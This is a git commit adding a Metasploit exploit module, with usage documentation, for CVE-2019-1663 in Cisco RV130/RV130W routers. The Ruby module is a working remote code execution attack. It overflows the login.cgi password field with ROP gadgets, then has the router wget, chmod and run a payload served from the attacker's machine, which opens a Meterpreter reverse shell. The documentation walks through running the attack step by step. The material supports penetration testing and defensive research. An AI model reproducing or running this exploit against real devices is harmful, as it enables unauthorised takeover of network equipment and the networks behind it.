Exploit for CVE-2019-1663 on Cisco RV130(W).

2019-03-22 17:34:12 +01:00 · 2019-03-22 17:34:12 +01:00 · ef2c4310a4
parent 1bf93ab1bc
commit ef2c4310a4
2 changed files with 204 additions and 0 deletions
--- a/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
@ -0,0 +1,27 @@
+# Cisco RV130W Routers Management Interface Remote Command Execution
+
+A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+system of the affected device as a high-privilege user.
+
+## Vulnerable Device
+
+* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+This exploit was specifically written against version 1.0.3.28. To test, you can find the
+firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
+4. ```set rhost [IP]```
+5. ```set payload linux/armle/meterpreter_reverse_tcp```
+6. ```set lhost [IP]```
+7. ```exploit```
+8. You should get a session
+
--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# linux/armle/meterpreter/bind_tcp -> segfault
+# linux/armle/meterpreter/reverse_tcp -> segfault
+# linux/armle/meterpreter_reverse_http -> works
+# linux/armle/meterpreter_reverse_https -> works
+# linux/armle/meterpreter_reverse_tcp -> works
+# linux/armle/shell/bind_tcp -> segfault
+# linux/armle/shell/reverse_tcp -> segfault
+# linux/armle/shell_bind_tcp -> segfault
+# linux/armle/shell_reverse_tcp -> segfault
+#
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Cisco RV130W Routers Management Interface Remote Command Execution',
+      'Description'    => %q{
+        A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
+         could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+         The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
+         An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+         A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+          system of the affected device as a high-privilege user.
+
+        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+      },
+      'Author'         =>
+        [
+          'Yu Zhang <>', # Initial discovery
+          'Haoliang Lu <>', # Initial discovery
+          'T. Shiomitsu <>', # Initial discovery
+          'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
+        ],
+      'License'         => MSF_LICENSE,
+      'Platform'        =>  %w[linux],
+      'Arch'            =>  [ARCH_ARMLE],
+      'SessionTypes'    =>  %w[meterpreter],
+      'Privileged'      => true, # BusyBox
+      'References'      =>
+        [
+          ['CVE', '2019-1663'],
+          ['CISCO-SA', '20190227'],
+          ['BID', '107185'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
+        ],
+      'DefaultOptions' => {
+          'WfsDelay' => 10,
+          'SSL' => true,
+          'RPORT' => 443,
+          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+       },
+      'Targets'        =>
+        [
+          [ 'Cisco RV130 < 1.0.3.45',
+            {
+              'offset'          => 446,
+              'libc_base_addr'  => 0x357fb000,
+              'system_offset'   => 0x0004d144,
+              'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
+              'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
+              'Arch'            => ARCH_ARMLE,
+            }
+          ],
+          [ 'Cisco RV130W < 1.0.3.45',
+            {
+              'offset'          => 446,
+              'libc_base_addr'  => 0x357fb000,
+              'system_offset'   => 0x0004d144,
+              'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
+              'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
+              'Arch'            => ARCH_ARMLE,
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Feb 27 2019',
+      'DefaultTarget'   => 0))
+  end
+
+  def p (offset)
+    [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
+  end
+
+  def prepare_shellcode(cmd)
+    #All these gadgets are from /lib/libc.so.0
+    shellcode = rand_text_alpha(target['offset']) +       # filler
+      p(target['gadget1']) +
+      p(target['system_offset']) +                        # r2
+      rand_text_alpha(4) +                                # r6
+      p(target['gadget2']) +                              # pc
+      cmd
+    shellcode
+  end
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    #print_status("on_request_uri called: #{request.inspect}")
+    if (not @pl)
+      print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{peer} - Sending the payload to the device...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  def send_request (payload)
+    begin
+      send_request_cgi({
+        'uri'     => '/login.cgi',
+        'method'  => 'POST',
+        'vars_post' => {
+              "submit_button": "login",
+              "submit_type": "",
+              "gui_action": "",
+              "wait_time": 0,
+              "change_action": "",
+              "enc": 1,
+              "user": "cisco",
+              "pwd": payload,
+              "sel_lang": "EN"
+          }
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Attempting to exploit #{target.name}")
+    downfile = rand_text_alpha(8+rand(8))
+    @pl = generate_payload_exe
+    @elf_sent = false
+    resource_uri = '/' + downfile
+
+    #do not use SSL
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+    print_status("#{peer} - Starting up our web service on #{service_url} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
+    }})
+
+    datastore['SSL'] = true if ssl_restore
+    print_status("#{peer} - Asking the device to download and execute #{service_url}")
+
+    filename = rand_text_alpha_lower(rand(8) + 2)
+    cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"
+
+    shellcode = prepare_shellcode(cmd)
+    send_request(shellcode)
+  end
+end